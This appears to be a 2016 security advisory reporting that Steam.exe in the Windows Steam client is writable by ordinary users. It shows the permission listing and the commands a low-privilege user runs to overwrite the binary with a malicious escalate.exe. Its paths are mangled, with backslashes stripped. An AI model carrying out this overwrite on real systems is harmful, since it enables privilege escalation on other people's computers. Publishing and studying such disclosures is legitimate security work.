Steam Insecure File Permissions Privilege Escalation
Posted on 30 November -0001
<HTML><HEAD><TITLE>Steam Insecure File Permissions Privilege Escalation</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY># Exploit Title: Steam Insecure File Permissions Privilege Escalation # Date: 24/09/2016 # Exploit Author: zaeek@protonmail.com # Vendor Homepage: http://store.steampowered.com/ # Version: 3.61.93.65 # Tested on: Windows 7 32/64bit ====Description==== Steam Client for Windows lacks of proper file permissions, creating a vector for privilege escalation attack. To properly exploit this vulnerability, the local attacker must overwrite the vulnerable file(s) with his malicious ones, as he has full Read/Write rights to the given file. ====Proof-of-Concept==== C:Program FilesSteam>cacls steam.exe C:Program FilesSteamSteam.exe BUILTINUsers:(ID)F NT AUTHORITYSYSTEM:(ID)F BUILTINAdministrators:(ID)F MASTER-PCMASTER:(ID)F ====Exploit==== c:>whoami test estusr c:>net user testusr User name testusr Full Name testusr (...) Local Group Memberships *Users Global Group memberships *None The command completed successfully. c:>copy C:Users estusrDesktopescalate.exe "C:Program FilesSteamSteam.exe" /y 1 file(s) copied. </BODY></HTML>
